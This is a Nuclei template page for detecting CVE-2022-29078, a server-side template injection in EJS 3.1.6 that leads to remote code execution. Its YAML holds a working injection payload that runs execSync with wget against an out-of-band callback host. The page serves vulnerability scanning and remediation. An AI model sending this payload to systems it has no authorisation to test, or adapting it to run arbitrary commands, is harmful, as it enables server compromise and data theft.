Skip to content
Nuclei Templates

Node.js Embedded JavaScript 3.1.6 - Template Injection

ID: CVE-2022-29078

Severity: critical

Author: For3stCo1d

Tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js

Description

Section titled “Description”

Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.

YAML Source

Section titled “YAML Source”
id: CVE-2022-29078


info:
  name: Node.js Embedded JavaScript 3.1.6 - Template Injection
  author: For3stCo1d
  severity: critical
  description: |
    Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
  impact: |
    Remote code execution can lead to unauthorized access, data leakage, and complete system compromise.
  remediation: |
    Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability.
  reference:
    - https://eslam.io/posts/ejs-server-side-template-injection-rce/
    - https://github.com/miko550/CVE-2022-29078
    - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29078
    - https://github.com/mde/ejs/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29078
    cwe-id: CWE-94
    epss-score: 0.28707
    epss-percentile: 0.96859
    cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: ejs
    product: ejs
    framework: node.js
  tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js


http:
  - raw:
      - |
        GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http


      - type: word
        part: body
        words:
          - You are viewing page number
# digest: 4b0a00483046022100a0bcaeaf020c1de954ccf83bcaae874f0a5a7b4a7964606fa127cb3a423500e9022100ab7661eb48a24da9b2bc892e23cde0064063414618c4896544d091bc067316a9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-29078.yaml"

View on Github